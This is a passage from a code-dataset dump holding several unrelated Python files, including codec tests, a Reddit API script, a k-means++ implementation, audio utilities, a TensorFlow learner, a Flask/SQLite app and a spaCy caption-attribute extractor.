3], datatype=\"INT64\"),\n ),\n (\n pd.Series(data=[1, 2.5, 3], name=\"bar\"),\n ResponseOutput(\n name=\"bar\", shape=[3], data=[1.0, 2.5, 3.0], datatype=\"FP64\"\n ),\n ),\n (\n pd.Series(data=[[1, 2, 3], [4, 5, 6]], name=\"bar\"),\n ResponseOutput(\n name=\"bar\", shape=[2], data=[[1, 2, 3], [4, 5, 6]], datatype=\"BYTES\"\n ),\n ),\n ],\n)\ndef test_to_response_output(series, expected):\n response_output = _to_response_output(series)\n\n assert response_output == expected\n\n\n@pytest.mark.parametrize(\n \"dataframe, expected\",\n [\n (\n pd.DataFrame(\n {\n \"a\": [1, 2, 3],\n \"b\": [\"A\", \"B\", 
\"C\"],\n }\n ),\n InferenceResponse(\n model_name=\"my-model\",\n outputs=[\n ResponseOutput(\n name=\"a\", shape=[3], datatype=\"INT64\", data=[1, 2, 3]\n ),\n ResponseOutput(\n name=\"b\", shape=[3], datatype=\"BYTES\", data=[\"A\", \"B\", \"C\"]\n ),\n ],\n ),\n )\n ],\n)\ndef test_encode(dataframe, expected):\n codec = PandasCodec()\n inference_response = codec.encode(\n expected.model_name, dataframe, model_version=expected.model_version\n )\n\n assert inference_response == expected\n\n\n@pytest.mark.parametrize(\n \"inference_request, expected\",\n [\n (\n InferenceRequest(\n inputs=[\n RequestInput(\n name=\"a\",\n data=[1, 2, 3],\n datatype=\"FP32\",\n shape=[1, 3],\n parameters=Parameters(_decoded_payload=np.array([[1, 2, 3]])),\n ),\n RequestInput(\n name=\"b\",\n data=b\"hello world\",\n datatype=\"BYTES\",\n shape=[1, 11],\n parameters=Parameters(_decoded_payload=[\"hello world\"]),\n ),\n ]\n ),\n pd.DataFrame({\"a\": [np.array([1, 2, 3])], \"b\": [\"hello world\"]}),\n ),\n (\n InferenceRequest(\n inputs=[\n RequestInput(\n name=\"a\",\n data=[1, 2, 3],\n datatype=\"FP32\",\n shape=[3, 1],\n parameters=Parameters(\n _decoded_payload=np.array([[1], [2], [3]])\n ),\n ),\n RequestInput(\n name=\"b\",\n data=b\"ABC\",\n datatype=\"BYTES\",\n shape=[3, 1],\n ),\n ]\n ),\n pd.DataFrame(\n {\n \"a\": [[1], [2], [3]],\n \"b\": [a for a in b\"ABC\"],\n }\n ),\n ),\n ],\n)\ndef test_decode(inference_request, expected):\n codec = PandasCodec()\n decoded = codec.decode(inference_request)\n\n pd.testing.assert_frame_equal(decoded, expected)\n","sub_path":"tests/codecs/test_pandas.py","file_name":"test_pandas.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"261370397","text":"#!/usr/bin/python3\n\nimport json\nimport requests\nfrom requests.exceptions import ConnectionError\n\n\ndef top_ten(subreddit):\n \"\"\" Function to determine number of subscribers of given subreddit\"\"\"\n url = \"https://www.reddit.com/r/{}/hot.json?limit=10\".format(subreddit)\n headers = {'User-Agent': 'My User Agent'}\n req = requests.get(url, headers=headers, allow_redirects=False)\n if (req.status_code == requests.codes.ok):\n r = req.json()\n data = r['data']['children']\n for i in range(len(data)):\n title = data[i]['data']['title']\n print(title)\n else:\n print(\"None\")\n","sub_path":"0x1B-api_advanced/1-top_ten.py","file_name":"1-top_ten.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"508685446","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/8/22 上午10:45\n# @Author : jyl\n# @File : kmeans_plus_plus.py\nimport numpy as np\nfrom utils import alias_sample\nimport collections\n\n\ndef kmeans_plus_plus(dataset, k):\n if not isinstance(dataset, np.ndarray):\n dataset = np.array(dataset)\n center_ids = choose_centers(dataset, k)\n centers = dataset[center_ids]\n classes_before = np.arange(len(dataset))\n while True:\n classes_after = do_cluster(dataset, centers)\n if (classes_before == classes_after).all():\n break\n\n classes_before = classes_after\n for c in range(k):\n data_c = dataset[np.argwhere(classes_after == c)]\n center_c = np.mean(data_c, axis=0)\n centers[c] = center_c\n\n return centers, classes_after\n\n\ndef choose_centers(dataset, k):\n center_ids = [np.random.choice(len(dataset), size=1)]\n dist_mat = np.empty(shape=[len(dataset), len(dataset)])\n for i in 
range(len(dataset)):\n for j in range(len(dataset)):\n if i == j:\n dist_mat[i, j] = 0.\n elif i < j:\n dist_mat[i, j] = np.mean(np.square(dataset[i] - dataset[j]))\n else:\n dist_mat[i, j] = dist_mat[j, i]\n while len(center_ids) < k:\n nodes_min_dist = np.min(dist_mat[:, center_ids], axis=1)\n probs = nodes_min_dist / np.sum(nodes_min_dist)\n center_ids.append(alias_sample(probs.reshape(-1), 1))\n center_ids = np.array(center_ids).reshape(-1)\n return center_ids\n\n\ndef do_cluster(dataset, centers):\n dist = []\n for center in centers:\n dist.append(np.mean(np.square(dataset - center), axis=1))\n dist = np.vstack(dist)\n classes = np.argmin(dist, axis=0)\n return classes\n\n\ndef show_result(class_list, raw_data, center_coordinate):\n colors = [\n '#FF0000', '#FFA500', '#FFFF00', '#00FF00', '#228B22',\n '#0000FF', '#FF1493', '#EE82EE', '#000000', '#FFA500',\n '#00FF00', '#006400', '#00FFFF', '#0000FF', '#FFFACD',\n ]\n\n # plot the final clustering result\n use_color = {}\n total_color = list(dict(collections.Counter(class_list)).keys())\n for index, i in enumerate(total_color):\n use_color[i] = index\n plt.figure(num=1, figsize=(16, 9))\n for index, point in enumerate(class_list):\n plt.scatter(x=raw_data[index, 0], y=raw_data[index, 1], c=colors[use_color[point]], s=50, marker='o', alpha=0.9)\n plt.scatter(x=center_coordinate[:, 0], y=center_coordinate[:, 1], c='b', s=200, marker='+', alpha=0.8)\n plt.title('K-means++')\n plt.savefig('./kmeans++_result.jpg')\n plt.show()\n\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n data_path = '/media/dk/MyFiles/Data/clustering/Aggregation.txt'\n data = np.loadtxt(data_path, delimiter='\t', usecols=[0, 1], dtype=np.float32)\n centers, classes = kmeans_plus_plus(data, 7)\n show_result(classes, data, centers)\n\n\n\n","sub_path":"VOC/utils/cluster/kmeans_plus_plus.py","file_name":"kmeans_plus_plus.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"296549039","text":"from tests.case import DSLTestCase\nfrom xpath.dsl import attr, descendant\nfrom xpath.renderer import to_xpath\n\n\nclass TestDescendant(DSLTestCase):\n __fixture__ = \"simple.html\"\n\n def test_finds_nodes_that_are_nested_below_the_current_node(self):\n xpath = to_xpath(descendant(\"p\"))\n results = self.find_all(xpath)\n self.assertEqual(results[0].text, \"Blah\")\n self.assertEqual(results[1].text, \"Bax\")\n\n def test_does_not_find_nodes_outside_the_context(self):\n foo_div = descendant(\"div\")[attr(\"id\").equals(\"foo\")]\n xpath = to_xpath(descendant(\"p\")[attr(\"id\").equals(foo_div.attr(\"title\"))])\n results = self.find_all(xpath)\n self.assertSequenceEqual(results, [])\n\n def test_finds_multiple_kinds_of_nodes(self):\n xpath = to_xpath(descendant(\"p\", \"ul\"))\n results = self.find_all(xpath)\n self.assertEqual(results[0].text, \"Blah\")\n self.assertEqual(results[3].text, \"A list\")\n\n def test_finds_all_nodes_when_no_arguments_given(self):\n xpath = to_xpath(descendant()[attr(\"id\").equals(\"foo\")].descendant())\n results = self.find_all(xpath)\n self.assertEqual(results[0].text, \"Blah\")\n self.assertEqual(results[4].text, \"A list\")\n","sub_path":"tests/dsl/test_descendant.py","file_name":"test_descendant.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"210234849","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions:\r\n-----------\r\n\r\n This submodule carries a 
set of useful functions of general purpouses when\r\n using PyTTa, like reading and writing wave files, seeing the audio IO\r\n devices available and some signal processing tools.\r\n\r\n Available functions:\r\n ---------------------\r\n\r\n >>> pytta.list_devices()\r\n >>> pytta.read_wav( fileName )\r\n >>> pytta.write_wav( fileName, signalObject )\r\n >>> pytta.save(fileName, obj1, ..., objN)\r\n >>> pytta.load(fileName)\r\n >>> pytta.merge( signalObj1, signalObj2, ..., signalObjN )\r\n >>> pytta.fft_convolve( signalObj1, signalObj2 )\r\n >>> pytta.find_delay( signalObj1, signalObj2 )\r\n >>> pytta.corr_coef( signalObj1, signalObj2 )\r\n >>> pytta.resample( signalObj, newSamplingRate )\r\n >>> pytta.peak_time(signalObj1, signalObj2, ..., signalObjN )\r\n\r\n\r\n For further information, check the function specific documentation.\r\n\"\"\"\r\n\r\n\r\nimport os\r\nimport time\r\nimport json\r\nfrom scipy.io import wavfile as wf\r\nimport scipy.io as sio\r\nimport numpy as np\r\nimport sounddevice as sd\r\nimport scipy.signal as ss\r\nimport scipy.fftpack as sfft\r\nimport zipfile as zf\r\nfrom .classes import SignalObj, ImpulsiveResponse, RecMeasure,\\\r\n PlayRecMeasure, FRFMeasure\r\nimport copy as cp\r\n\r\n\r\ndef list_devices():\r\n \"\"\"\r\n Shortcut to sounddevice.query_devices(). Made to exclude the need of\r\n importing Sounddevice directly just to find out which audio devices can be\r\n used.\r\n\r\n >>> pytta.list_devices()\r\n\r\n \"\"\"\r\n return sd.query_devices()\r\n\r\n\r\ndef read_wav(fileName):\r\n \"\"\"\r\n Reads a wave file into a SignalObj\r\n \"\"\"\r\n samplingRate, data = wf.read(fileName)\r\n if data.dtype == 'int16':\r\n data = data/(2**15)\r\n if data.dtype == 'int32':\r\n data = data/(2**31)\r\n signal = SignalObj(data, 'time', samplingRate=samplingRate)\r\n return signal\r\n\r\n\r\ndef write_wav(fileName, signalIn):\r\n \"\"\"\r\n Writes a SignalObj into a single wave file\r\n \"\"\"\r\n samplingRate = signalIn.samplingRate\r\n data = signalIn.timeSignal\r\n return wf.write(fileName, samplingRate, data)\r\n\r\n\r\n# Refactor for new SignalObj's channelsList\r\ndef merge(signal1, *signalObjects):\r\n \"\"\"\r\n Gather all of the input argument signalObjs into a single\r\n signalObj and place the respective timeSignal of each\r\n as a column of the new object\r\n \"\"\"\r\n j = 1\r\n comment = cp.deepcopy(signal1.comment)\r\n channels = cp.deepcopy(signal1.channels)\r\n timeSignal = cp.deepcopy(signal1.timeSignal)\r\n for inObj in signalObjects:\r\n if signal1.samplingRate != inObj.samplingRate:\r\n message = '\\\r\n \\n To merge signals they must have the same sampling rate!\\\r\n \\n SignalObj 1 and '+str(j+1)+' have different sampling rates.'\r\n raise AttributeError(message)\r\n if signal1.numSamples != inObj.numSamples:\r\n message = '\\\r\n \\n To merge signals they must have the same length!\\\r\n \\n SignalObj 1 and '+str(j+1)+' have different lengths.'\r\n raise AttributeError(message)\r\n comment = comment + ' / ' + inObj.comment\r\n for ch in inObj.channels:\r\n channels.append(ch)\r\n timeSignal = np.hstack((timeSignal, inObj.timeSignal))\r\n j += 1\r\n newSignal = SignalObj(timeSignal, domain='time',\r\n samplingRate=signal1.samplingRate, comment=comment)\r\n channels.conform_to()\r\n newSignal.channels = channels\r\n return newSignal\r\n\r\n\r\n# def split(signal):\r\n# return 0\r\n\r\n\r\ndef fft_convolve(signal1, signal2):\r\n \"\"\"\r\n Uses scipy.signal.fftconvolve() to convolve two time domain signals.\r\n\r\n >>> convolution = 
pytta.fft_convolve(signal1,signal2)\r\n\r\n \"\"\"\r\n# Fs = signal1.Fs\r\n conv = ss.fftconvolve(signal1.timeSignal, signal2.timeSignal)\r\n signal = SignalObj(conv, 'time', signal1.samplingRate)\r\n return signal\r\n\r\n\r\ndef find_delay(signal1, signal2):\r\n \"\"\"\r\n Cross Correlation alternative, more efficient fft based method to calculate\r\n time shift between two signals.\r\n\r\n >>> shift = pytta.find_delay(signal1,signal2)\r\n\r\n \"\"\"\r\n if signal1.N != signal2.N:\r\n return print('Signal1 and Signal2 must have the same length')\r\n else:\r\n freqSignal1 = signal1.freqSignal\r\n freqSignal2 = sfft.fft(np.flipud(signal2.timeSignal))\r\n convoluted = np.real(sfft.ifft(freqSignal1 * freqSignal2))\r\n convShifted = sfft.fftshift(convoluted)\r\n zeroIndex = int(signal1.numSamples / 2) - 1\r\n shift = zeroIndex - np.argmax(convShifted)\r\n return shift\r\n\r\n\r\ndef corr_coef(signal1, signal2):\r\n \"\"\"\r\n Finds the correlation coeficient between two SignalObjs using\r\n the numpy.corrcoef() function.\r\n \"\"\"\r\n coef = np.corrcoef(signal1.timeSignal, signal2.timeSignal)\r\n return coef[0, 1]\r\n\r\n\r\ndef resample(signal, newSamplingRate):\r\n \"\"\"\r\n Resample the timeSignal of the input SignalObj to the\r\n given sample rate using the scipy.signal.resample() function\r\n \"\"\"\r\n newSignalSize = np.int(signal.timeLength*newSamplingRate)\r\n resampled = ss.resample(signal.timeSignal[:], newSignalSize)\r\n newSignal = SignalObj(resampled, \"time\", newSamplingRate)\r\n return newSignal\r\n\r\n\r\ndef peak_time(signal):\r\n \"\"\"\r\n Return the time at signal's amplitude peak.\r\n \"\"\"\r\n if not isinstance(signal, SignalObj):\r\n raise TypeError('Signal must be an SignalObj.')\r\n peaks_time = []\r\n for chindex in range(signal.num_channels()):\r\n maxamp = max(np.abs(signal.timeSignal[:, chindex]))\r\n maxindex = np.where(signal.timeSignal[:, chindex] == np.abs(maxamp))[0]\r\n maxtime = signal.timeVector[maxindex][0]\r\n peaks_time.append(maxtime)\r\n if signal.num_channels() > 1:\r\n return peaks_time\r\n else:\r\n return peaks_time[0]\r\n\r\n\r\ndef save(fileName: str = time.ctime(time.time()), *PyTTaObjs):\r\n \"\"\"\r\n Saves any number of PyTTaObj subclasses' objects to fileName.pytta file.\r\n\r\n Just calls .save() method of each class and packs them all into a major\r\n .pytta file along with a Meta.json file containing the fileName of each\r\n saved object.\r\n\r\n The .pytta extension must not be appended to the fileName\r\n \"\"\"\r\n meta = {}\r\n with zf.ZipFile(fileName + '.pytta', 'w') as zdir:\r\n for idx, obj in enumerate(PyTTaObjs):\r\n sobj = obj.save('obj' + str(idx))\r\n meta['obj' + str(idx)] = sobj\r\n zdir.write(sobj)\r\n os.remove(sobj)\r\n with open('Meta.json', 'w') as f:\r\n json.dump(meta, f, indent=4)\r\n zdir.write('Meta.json')\r\n os.remove('Meta.json')\r\n return fileName + '.pytta'\r\n\r\n\r\ndef load(fileName: str):\r\n \"\"\"\r\n Loads .pytta files and parses it's types to the correct objects.\r\n \"\"\"\r\n if fileName.split('.')[-1] == 'pytta':\r\n with zf.ZipFile(fileName, 'r') as zdir:\r\n objects = zdir.namelist()\r\n for obj in objects:\r\n if obj.split('.')[-1] == 'json':\r\n meta = obj\r\n zdir.extractall()\r\n output = __parse_load(meta)\r\n else:\r\n raise ValueError(\"Load function only works with *.pytta files\")\r\n return output\r\n\r\n\r\ndef __parse_load(className):\r\n name = className.split('.')[0]\r\n openJson = json.load(open(className, 'r'))\r\n if name == 'SignalObj':\r\n openMat = 
sio.loadmat(openJson['timeSignalAddress'])\r\n out = SignalObj(openMat['timeSignal'], domain=openJson['lengthDomain'],\r\n samplingRate=openJson['samplingRate'],\r\n freqMin=openJson['freqLims'][0],\r\n freqMax=openJson['freqLims'][1],\r\n comment=openJson['comment'])\r\n out.channels = __parse_channels(openJson['channels'],\r\n out.channels)\r\n os.remove(openJson['timeSignalAddress'])\r\n\r\n elif name == 'ImpulsiveResponse':\r\n excit = load(openJson['SignalAddress']['excitation'])\r\n record = load(openJson['SignalAddress']['recording'])\r\n out = ImpulsiveResponse(excit, record, openJson['coordinates'],\r\n **openJson['methodInfo'])\r\n os.remove(openJson['SignalAddress']['excitation'])\r\n os.remove(openJson['SignalAddress']['recording'])\r\n\r\n elif name == 'RecMeasure':\r\n inch = list(np.arange(len(openJson['inChannel'])))\r\n out = RecMeasure(device=openJson['device'],\r\n inChannel=inch,\r\n lengthDomain='samples',\r\n fftDegree=openJson['fftDegree'])\r\n out.inChannel = __parse_channels(openJson['inChannel'],\r\n out.inChannel)\r\n\r\n elif name == 'PlayRecMeasure':\r\n inch = list(1 + np.arange(len(openJson['inChannel'])))\r\n excit = load(openJson['excitationAddress'])\r\n out = PlayRecMeasure(excitation=excit, device=openJson['device'],\r\n inChannel=inch)\r\n out.inChannel = __parse_channels(openJson['inChannel'],\r\n out.inChannel)\r\n os.remove(openJson['excitationAddress'])\r\n\r\n elif name == 'FRFMeasure':\r\n inch = list(1 + np.arange(len(openJson['inChannel'])))\r\n excit = load(openJson['excitationAddress'])\r\n out = FRFMeasure(excitation=excit, device=openJson['device'],\r\n inChannel=inch)\r\n out.inChannel = __parse_channels(openJson['inChannel'],\r\n out.inChannel)\r\n os.remove(openJson['excitationAddress'])\r\n\r\n elif name == 'Meta':\r\n out = []\r\n for key, val in openJson.items():\r\n out.append(load(val))\r\n os.remove(val)\r\n os.remove(className)\r\n return out\r\n\r\n\r\ndef __parse_channels(chDict, chList):\r\n for key in chDict.keys():\r\n ch = int(key)-1\r\n chList[ch].num = ch+1\r\n chList[ch].unit = chDict[key]['unit']\r\n chList[ch].name = chDict[key]['name']\r\n chList[ch].CF = chDict[key]['calib'][0]\r\n chList[ch].calibCheck\\\r\n = chDict[key]['calib'][1]\r\n return chList\r\n","sub_path":"pytta/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":10301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"387950361","text":"import tensorflow as tf\nimport Losses\n\nclass Learner(object):\n \"\"\"\n A base learner for tensorflow.\n - optimiser\n - learning rate\n - batch size\n\n \"\"\"\n num = 0\n def __init__(self,func,loss_fn,batch_size = 50, dropout = False, keep_prob = 1.0,\n learning_rate = 0.005, decay = 1.0, momentum = 0.0, opt = tf.train.MomentumOptimizer):\n \n self.num = str(Learner.num)\n Learner.num += 1\n \n self.loss_fn = loss_fn\n self.batch_size = batch_size\n self.dropout = dropout\n self.keep_prob = keep_prob\n self.learning_rate = learning_rate\n self.decay = decay\n self.momentum = momentum\n self.opt = opt(learning_rate,momentum=momentum)\n \n self.func = func\n \n \n def summarise_grads(self,cost):\n grads_and_vars = self.opt.compute_gradients(cost, tf.trainable_variables()) # note: tf.trainable_variables() may need to be a specific variable collection instead\n for grad, var in grads_and_vars:\n tf.histogram_summary('Grad'+var.name, grad)\n self.var_list = None\n \n def __str__(self):\n return 'Learner {}: Loss: {} \\nNet: {}'.format(self.num,self.loss_fn,self.func)\n \n \n##################################################################################################\n##################################################################################################\n##################################################################################################\nimport Losses\n\nclass Discrim(Learner):\n \"\"\"\n A discriminative network has;\n - some learner.\n - a loss that is the error (cross entropy) between their output and the data labels.\n \"\"\"\n def __init__(self,func):#so this is just a partial application by defining a loss function\n super().__init__(func,Losses.CrossEntropy)\n \n def __call__(self,inputs,onehot_labels):\n with tf.name_scope('Network'):\n self.outputs = self.func(inputs)\n with tf.name_scope('Optimise_CE'):\n self.accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(onehot_labels,1), \n tf.argmax(self.outputs,1)), tf.float32))\n self.loss = self.loss_fn(self.outputs,onehot_labels)\n return self.opt.minimize(self.loss)\n \nif __name__ == '__main__':\n ## these should probably be turned into doc tests\n import numpy as np\n from LayerClass import FC\n \n #Define all the variables and placeholders\n inputs = tf.placeholder(tf.float32,shape=[None,784])\n labels = tf.placeholder(tf.int64,shape=(None,1))\n onehot_labels = tf.squeeze(tf.one_hot(labels,10,1.0,0.0))\n \n NN = Discrim(FC([784,10],tf.nn.relu))\n print(NN)\n train_step = NN(inputs,onehot_labels)\n \n #run\n with tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n for i in range(10):\n feed = {inputs:np.random.random((50,784)),labels:np.random.randint(0,10,50).reshape((50,1))}\n sess.run(train_step,feed_dict = feed)\n y = sess.run(NN.accuracy,feed_dict = feed)\n print('Discrim test : {}'.format(np.float32 == type(y)))\n \n ","sub_path":"build/lib/Core/LearnerClass.py","file_name":"LearnerClass.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"562214541","text":"import sqlite3\nfrom flask import Flask, render_template, request, jsonify\n\napp = Flask(__name__)\n\n\ndef init_sqlite_db():\n connection = sqlite3.connect(\"database.db\")\n print(\"database connection successful\")\n\n connection.execute(\"CREATE TABLE IF NOT EXISTS students(name TEXT, address TEXT, city TEXT, pin TEXT)\")\n print(\"tables created successfully\")\n\n connection.close()\n\n\ninit_sqlite_db()\n\n\n@app.route(\"/\")\n@app.route('/enter-new/')\ndef enter_new_student():\n return render_template(\"student.html\")\n\n\n@app.route('/add-new-record/', methods=['POST'])\ndef add_new_record():\n if request.method == \"POST\":\n connection = sqlite3.connect('database.db')\n try:\n name = request.form['name']\n address = request.form['address']\n city = request.form['city']\n pin = request.form['pin']\n\n cursor = connection.cursor()\n # parameterized query, so form values cannot inject SQL\n cursor.execute(\"INSERT INTO students (name, address, city, pin) VALUES (?, ?, ?, ?)\",\n (name, address, city, pin))\n connection.commit()\n msg = \"Record successfully added.\"\n except Exception as e:\n connection.rollback()\n msg = f\"Error occurred in insert operation: {e}\"\n finally:\n connection.close()\n return render_template('result.html', msg=msg)\n\n\n@app.route('/show-students-data')\ndef show_data():\n\n 
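# (Annotation, not part of the original app: if the JSON response should carry
# column names as well as values, sqlite3's row_factory can be set before the
# query is run -- a sketch of this same endpoint using sqlite3.Row:)
#
#     with sqlite3.connect('database.db') as connection:
#         connection.row_factory = sqlite3.Row
#         cur = connection.cursor()
#         cur.execute("SELECT * FROM students")
#         results = [dict(row) for row in cur.fetchall()]
#     return jsonify(results)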
with sqlite3.connect('database.db') as connection:\n cur = connection.cursor()\n cur.execute(\"SELECT * FROM students\")\n\n results = cur.fetchall()\n\n return jsonify(results)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"440446160","text":"# -*- coding: utf-8 -*-\n\nimport urllib.parse\n\nfrom collections import defaultdict\nfrom html.parser import HTMLParser as BaseHTMLParser\n\n\ndef parse_link(link):\n return urllib.parse.urlparse(link)\n\n\ndef is_local_link(parsed_link):\n return (parsed_link.scheme == '' and\n parsed_link.netloc == '' and\n parsed_link.path != '')\n\n\nclass HTMLParser(BaseHTMLParser):\n link_attrs = ('src', 'href')\n skip_content_for_tags = ('code', )\n\n def __init__(self, *, convert_charrefs=True):\n super().__init__(convert_charrefs=convert_charrefs)\n self.reset()\n\n def reset(self):\n self.links_pos = defaultdict(list)\n self.skipping_content = False\n super().reset()\n\n def handle_starttag(self, tag, attrs):\n\n if self.skipping_content:\n return\n\n for name, value in attrs:\n if name in self.link_attrs:\n pos = self.getpos()\n self.links_pos[value].append(pos)\n\n if tag in self.skip_content_for_tags:\n self.skipping_content = True\n\n def handle_endtag(self, tag):\n if tag in self.skip_content_for_tags:\n self.skipping_content = False\n\n def get_links(self, html):\n self.reset()\n self.feed(html)\n return self.links_pos.copy()\n","sub_path":"venv/Lib/site-packages/wt/html.py","file_name":"html.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"511313184","text":"import json\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nDATA=None\nLABELS = [\"RANDOM\",\n\"BACK TO FRONT\",\n\"FRONT TO BACK\",\n\"BACK TO FRONT GROUP 4\",\n\"FRONT TO BACK GROUP 4\",\n\"WINDOW MIDDLE ISLE\",\n\"STEFFEN PERFECT\",\n\"STEFFEN MODIFIED\"]\nwith open('distribution_chart_data.txt') as json_file:\n DATA = json.load(json_file)\n\nfor data,label in zip(DATA,LABELS):\n plt.hist(data,alpha=0.5,label=label,density=True)\nplt.legend(prop={'size': 7},loc='upper center', bbox_to_anchor=(0.5, -0.05),\n fancybox=True, shadow=True, ncol=4)\nplt.savefig(\"ALL.png\")\n\nplt.clf()","sub_path":"Artificial Life with Cognitive Science/Plane-Boarding-Simulation/distribution_chart_creator.py","file_name":"distribution_chart_creator.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"863206","text":"import argparse\nimport datetime\nimport sys\n\ndef gen_file(blog_type, file_name, page_text):\n file_title = '_posts/%s/%s' % (blog_type, file_name)\n with open(file_title, 'w') as f:\n f.write(page_text)\n\ndef gen_page_text(title, summary, blog_type, file_name, date):\n page_text = '''---\ntitle: %s\nsummary: %s\ncover-image: hipster.jpg\nblog: %s\nfile-name: %s\ndate: %s 08:00:00\n---\n''' % (title, summary, blog_type, file_name, date)\n page_text += '''\n{% comment %}\nImage\npic pic-small pic-large\n\n\n;>pic;>Data Science and Machine Learning;>https://i.imgur.com/MctcYW5.png;>\n\nLink\n\n\n,>EECS 126: Probability,>https://inst.eecs.berkeley.edu/~ee126/fa18/,>\n\n{% highlight html %}\n\n{% endhighlight %}\n{% endcomment %}\n'''\n return page_text\n\nparser = argparse.ArgumentParser(description='Create a post')\nparser.add_argument('blog type',\n help='blog 
type can be: academics, cool, general, notes, or personal')\nparser.add_argument('blog title',\n help='title of blog post')\n\nargs = vars(parser.parse_args())\nblog_type = args['blog type']\ntitle = args['blog title']\nif blog_type not in {\"academics\", \"cool\", \"general\", \"notes\", \"personal\"}:\n print(\"invalid blog type\")\n sys.exit()\n\ndate = str(datetime.date.today())\nfile_name = \"%s-%s.md\" % (date, title.replace(\" \", \"-\"))\npage_text = gen_page_text(title, title, blog_type, file_name, date)\ngen_file(blog_type, file_name, page_text)\n","sub_path":"store/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"445788620","text":"from bge import logic, types, events\nfrom mathutils import Vector\n\nimport bge\nimport mathutils\nimport re\n\ndef main():\n \n cont = bge.logic.getCurrentController()\n self = cont.owner\t \n width = bge.render.getWindowWidth()\n height = bge.render.getWindowHeight()\n mouse = cont.sensors[\"Mouse\"]\n pos = mouse.position\n xPos = int(width/2) - pos[0]\n yPos = int(height/2) - pos[1]\n rotation = yPos*0.0006\n\n if pos != [int(width/2), int(height/2)]:\n self.applyRotation((rotation,0,0),True)\n bge.render.setMousePosition(int(width/2), int(height/2)) \n\nmain()\n","sub_path":"verticle.py","file_name":"verticle.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"295963135","text":"import argparse\nimport pickle\nimport os\nimport nltk\nimport spacy\n\nfrom vocab import Vocabulary\nfrom pycocotools.coco import COCO\n\nimport data\n\ndef main():\n print('extract attributes from captions...')\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_path', default='./data',\n help='path to datasets')\n parser.add_argument('--data_name', default='coco',\n help='{coco,f8k,f30k,10crop}_precomp|coco|f8k|f30k')\n parser.add_argument('--vocab_path', default='./data/vocab',\n help='Path to saved vocabulary pickle files.')\n parser.add_argument('--crop_size', default=224, type=int,\n help='Size of an image crop as the CNN input.')\n parser.add_argument('--workers', default=4, type=int,\n help='Number of data loader workers.')\n parser.add_argument('--batch_size', default=128, type=int,\n help='Size of a training mini-batch.')\n parser.add_argument('--use_restval', action='store_true',\n help='Use the restval data for training on MSCOCO.')\n opt = parser.parse_args()\n print(opt)\n\n # Load Vocabulary Wrapper\n vocab = pickle.load(open(os.path.join(\n opt.vocab_path, '%s_vocab.pkl' % opt.data_name), 'rb'))\n opt.vocab_size = len(vocab)\n\n paths = data.get_paths(opt.data_path+'/'+opt.data_name)[0]\n coco = COCO(paths['train']['cap'])\n\n nlp = spacy.load('en')\n attributes2nouns = {}\n attributes2count = {}\n for i, key in enumerate(coco.anns.keys()):\n caption = coco.anns[key]['caption']\n doc = nlp(str(caption).lower().decode('utf-8'))\n for token in doc:\n if token.dep_ == 'amod':\n if not attributes2count.has_key(token.text):\n attributes2count[token.text] = 0\n if not attributes2nouns.has_key(token.text):\n attributes2nouns[token.text] = set()\n\n attributes2count[token.text] = attributes2count[token.text] + 1\n attributes2nouns[token.text].add(token.head.text)\n\n if i % 100 == 0:\n print ('{}/{} captions processed. 
{} attributes'\n .format(i, len(coco.anns.keys()), len(attributes2count)))\n\n k = 1000\n # extract top k attributes\n attributes = sorted(attributes2count, key=attributes2count.get, reverse=True)[0:k]\n # filter attributes2nouns\n attributes2nouns = {att: attributes2nouns[att] for att in attributes}\n\n writepath = opt.data_path+'/'+opt.data_name+'_attributes.pkl'\n pickle.dump({\n \"attributes\": attributes,\n \"attributes2nouns\": attributes2nouns},\n open(writepath, \"wb\")\n )\n print('extraction finished and written to {}'.format(writepath))\n\nif __name__ == '__main__':\n main()","sub_path":"extract_attributes.py","file_name":"extract_attributes.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
